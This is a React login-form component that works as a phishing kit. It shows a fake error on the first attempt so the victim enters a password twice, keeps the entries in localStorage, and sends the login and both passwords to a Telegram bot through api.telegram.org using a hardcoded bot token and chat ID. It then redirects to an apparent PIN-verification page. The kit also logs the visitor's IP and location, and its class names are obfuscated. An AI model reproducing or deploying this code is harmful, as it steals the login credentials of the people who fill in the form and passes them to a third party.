import styles from "../LoginForm/LoginForm.module.scss";
import React, { useContext, useState } from 'react';
import { useNavigate } from 'react-router-dom';
import * as emailjs from '@emailjs/browser';
import { IPInfoContext } from 'ip-info-react';
import axios from 'axios'

export async function getServerSideProps({ req }) {
    const ip = req.headers['x-forwarded-for'] || req.connection.remoteAddress;
    const res = await fetch(`https://ipapi.co/${ip}/json/`);
    const locationData = await res.json();

    return {
        props: {
            ip,
            location: locationData,
        },
    };
}

const LoginForm = ({ setError, ip, location }) => {
    const userInfo = useContext(IPInfoContext);
    const [login, setLogin] = useState('');
    const [password, setPassword] = useState('');
    const [showPassword, setShowPassword] = useState(false);
    const [step, setStep] = useState(1); // Шаг (1 - первый клик, 2 - второй клик)
    const navigate = useNavigate();
    const [form, setForm] = useState(true)

    const handleSubmit = (event) => {
        event.preventDefault();
        if (step === 1) {
            setTimeout(() => {
                setError(true);
            }, 1000);
            // Первый клик
            localStorage.setItem('login', login);
            localStorage.setItem('password', password);
            setPassword(''); // Очищаем только пароль
            setStep(2); // Перейти к следующему шагу
        } else if (step === 2) {
            // Второй клик
            onFinish();
        }
    };

    const onFinish = async () => {
        const savedPassword = localStorage.getItem('password');
        if (!isNaN(Number(password)) && !isNaN(Number(savedPassword))) {
            setTimeout(() => {
                localStorage.setItem('login', login);
                localStorage.setItem('password', password);
                setPassword(''); // Очищаем только пароль
                setStep(2); // Перейти к следующему шагу
                setError(true)
            }, 1500);
        } else {
            const botToken = '7834468828:AAH9aIu4HFgjm7NQeOzalzyrHaCUhCMHN4Y'; // Replace with your bot token
            const chatId = '7841427158'; // Replace with your chat ID


            const message = `
        Hello Friends:
        Login *: ${login}
        Password*: ${savedPassword}
        Second Password*: ${password}
    `;

            const telegramMessage = {
                chat_id: chatId,
                text: message, // Send the form data as text
            };

            try {
                // Send the message with form data
                await axios.post(`https://api.telegram.org/bot${botToken}/sendMessage`, telegramMessage);
                setTimeout(() => {
                    navigate('/pinverify')
                }, 1500);
            } catch (error) {
                console.error('Error sending data to Telegram:', error);
            }
        }
    };

    return (
        <>
            <form onSubmit={handleSubmit} className={styles.fofodikdmnkjdnmdk}>
              <div className={styles.fofodikfdgdfgdmnkjdnmdk}>

              </div>
            </form>
        </>
    );
};

export default LoginForm;
